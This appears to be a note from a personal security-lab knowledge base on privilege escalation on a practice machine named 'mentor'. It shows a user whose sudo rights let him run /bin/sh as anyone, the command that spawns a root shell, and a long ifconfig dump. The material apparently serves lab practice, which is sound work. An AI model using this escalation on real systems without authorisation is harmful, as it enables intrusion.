InfoSec LAB

`/bin/sh`

sudo privileges of the james user was identified that the user is able to execute /bin/sh as ANYONE
james@mentor:~$ sudo -u root /bin/sh -i
# whoami
root
# hostname
mentor
# ifconfig
br-028c7a43f929: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.20.0.1  netmask 255.255.0.0  broadcast 172.20.255.255
        ether 02:42:05:24:4c:de  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-24ddaa1f3b47: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.19.0.1  netmask 255.255.0.0  broadcast 172.19.255.255
        ether 02:42:91:6d:19:94  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-3d63c18e314d: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.21.0.1  netmask 255.255.0.0  broadcast 172.21.255.255
        ether 02:42:50:81:fe:3b  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-7d5c72654da7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.0.1  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::42:1cff:fefa:2974  prefixlen 64  scopeid 0x20<link>
        ether 02:42:1c:fa:29:74  txqueuelen 0  (Ethernet)
        RX packets 819638  bytes 68842503 (68.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 740725  bytes 78926999 (78.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-a8a89c3bf6ff: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:39:6b:f2:5a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:11:63:61:ef  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.193  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:d2:5d  txqueuelen 1000  (Ethernet)
        RX packets 656006  bytes 78542169 (78.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 731358  bytes 74752498 (74.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 5388  bytes 382968 (382.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5388  bytes 382968 (382.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth1fbf3a9: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::e007:5dff:fe58:a035  prefixlen 64  scopeid 0x20<link>
        ether e2:07:5d:58:a0:35  txqueuelen 0  (Ethernet)
        RX packets 131  bytes 19145 (19.1 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 200  bytes 17321 (17.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth79ba3f3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::c73:30ff:fe0d:6d10  prefixlen 64  scopeid 0x20<link>
        ether 0e:73:30:0d:6d:10  txqueuelen 0  (Ethernet)
        RX packets 399  bytes 22576 (22.5 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 426  bytes 24298 (24.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethda9f088: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::81f:24ff:fe8c:3447  prefixlen 64  scopeid 0x20<link>
        ether 0a:1f:24:8c:34:47  txqueuelen 0  (Ethernet)
        RX packets 819108  bytes 80275714 (80.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 740175  bytes 78890990 (78.8 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
System Level Compromise
InfoSec LAB

Explorer

Mentor_Privilege_Escalation

`/bin/sh`

Interactive Graph View

Backlinks
